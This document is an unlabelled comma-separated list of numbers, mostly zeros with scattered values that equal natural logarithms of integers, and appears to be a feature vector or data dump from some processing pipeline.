0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 4.912654885736052, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 3.6888794541139363, 0, 4.160336650881089, 3.044522437723423, 0.0, 0, 0.0, 4.605170185988092, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 3.0841946160253877, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.718498871295094, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0, 0.0, 0, 0.0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0, 2.1972245773362196, 0.0, 0, 0.0, 3.0841946160253877, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.995732273553991, 4.969813299576001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 6.9558749307258045, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.93848385770662, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 3.4011973816621555, 0, 0, 0.0, 0.0, 4.828313737302301, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.1298987149230735, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 2.550898738446989, 0, 0, 3.0841946160253877, 0.0, 0.0, 3.295836866004329, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 2.70805020110221, 0.0, 2.5649493574615367, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.550898738446989, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.367295829986474, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 4.160336650881089, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.178053830347946, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.1354942159291497, 0, 0.0, 0.0, 5.780743515792329, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 6.907755278982138, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 4.2626798770413155, 0, 0, 0, 0, 0, 5.723585101952381, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 3.2188758248682006, 0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 1.7412592803704001, 4.969640753475787, 0.0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.143134726391533, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 3.6375861597263857, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0841946160253877, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 5.567740402508132, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.9444389791664403, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 4.160336650881089, 0.0, 0.0, 0, 1.7412592803704001, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 8.995948045406804, 0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.3322045101752034, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 2.6390573296152584, 0.0, 0.0, 3.7369991058576035, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.970291913552122, 0, 3.7369991058576035, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.7535901911063645, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.423390507494619, 0.0, 0, 0, 0.0, 0, 4.160336650881089, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.70805020110221, 0.0, 0.0, 0.0, 0.0, 0, 3.6375861597263857, 0.0, 0.0, 0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 2.1972245773362196, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8066624897703196, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0, 3.044522437723423, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 2.772588722239781, 0.0, 3.713572066704308, 0.0, 0, 0, 5.03709614637473, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.995732273553991, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 3.7612001156935624, 0.0, 0.0, 2.772588722239781, 0, 3.2188758248682006, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.030104765080701, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.238324625039507, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 2.5649493574615367, 3.8918202981106265, 0.0, 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0, 0.0, 0.0, 0.0, 0.0, 6.731743096669168, 0.0, 0.0, 0.0, 0, 0, 0.0, 3.6635616461296467, 0, 0.0, 0, 2.9444389791664403, 0.0, 0.6931471805599453, 0, 0.0, 0.0, 0.0, 3.258096538021482, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.8903717578961645, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 4.890349128221754, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 2.1972245773362196, 0.0, 0, 0, 2.0794415416798357, 5.8888779583328805, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.8066078281957605, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 4.0943445622221, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 3.4339872044851467, 0, 0, 1.7412592803704001, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 3.784189633918261, 0, 0.0, 7.454719949364001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.897839799950911, 0.0, 0, 0, 0.0, 0.0, 0, 0, 2.1972245773362196, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 3.649511027115099, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0, 0, 0.0, 0, 0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 2.550898738446989, 0, 0, 4.160336650881089, 1.3862943611198906, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 4.1588830833596715, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.9444389791664403, 0, 0, 0.0, 0.0, 0, 4.1588830833596715, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.825453896395788, 0, 1.3862943611198906, 1.6094379124341003, 0, 1.6094379124341003, 6.778355426745129, 0, 0, 0.0, 0.0, 2.4849066497880004, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 1.9459101490553132, 1.9459101490553132, 0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 1.791759469228055, 0, 0.0, 0.0, 0.0, 0.0, 0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.1588830833596715, 0.0, 0.0, 0, 3.2958368660043296, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 